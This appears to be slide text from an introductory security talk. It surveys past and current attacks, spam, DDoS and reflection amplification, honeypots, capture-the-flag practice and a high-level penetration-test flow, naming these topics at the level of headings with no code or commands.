5. Attack Event
● Past
○ ATM 變彈珠台
○ Web ATM Vulnerability [2]
○ Website hacked [3]
○ Spam
○ Home router as botnet [4]
○ APT on government [5]
6. Attack Event (cont’d)
● Current
○ APT
○ Hack as a Service [6]
○ Mobile Hacking [7]
○ Heartbleed [8]
○ Orphan (DNS / NTP) Server
○ IOT Hacking
7. SPAM
● The email which you did not want it
○ Random generate
○ APT
● Spam contains
○ Phishing link
○ Malware
○ CryptoLocker [10]
○ ...
8. SPAM + Exploit
● So receive spam have no danger if I…
○ Not download the attachment?
○ Not click the link?
● Exploit on Reception Software
○ Malicious webpage
○ document preview
○ ...
9. DDoS
● Past
○ Ping to Death
○ SYN Flood
○ TearDrop Attack
○ Slow I/O Attack
○ …
● Design issue on program / protocol
11. DDoS + DNS / NTP
● 七傷拳
○ I DDoS U === U DDoS I
● 放大攻擊 (Reflection)
○ GET request => Full webpage
○ DNS request => DNS response
○ ...
12. Avoid DDoS
● Illusory
○ High-End firewall
○ ISP
○ Lots of backends
● Hacker always attack the weakness
○ Load balancer / Proxy Server / DNS Server / ...
13. Hard to Avoid DDoS
● Pattern matching
○ Not immediately respond
○ How about simulate general user
○ Variant is easy
● Total solution
○ 鎖國政策?
○ ISP?
14. HoneyPot
● A trap set to detect an unauthorized user.
○ 蜜罐 / 誘捕系統
○ A logging system based on full / simulation system
● Concept
○ Assume should be hacked
○ Logging
○ Analysis
16. HoneyPot + Analysis
● SPAM
○ Register a never used mail domain
○ Receive mail => SPAM which send to random addr
● SandBox
○ Simulate human behavior
○ Analysis the system status
17. HoneyPot + Analysis
● HoneyPot always be hacked
○ Too many events
○ Hard to analysis by trace the log one-by-one
● Visualization
○ 潮
21. Why CTF
● Practice as a hacker in legal way
● Simulate how hacker to attack
● Defence hacker
22. How CTF
● In the open network
○ On-line
○ Give a hink (IP address with service / binary)
○ Find the flag
● In the closed network
○ Non-limit
○ All device in subnet can be hacked
23. PenTest Flow
● Social Engineering
● Scan by nmap [9] (DDoS…)
● Choice one target / service
○ Web / SSH / SMB / FTP / UPnP / IRC / ...
● Hacking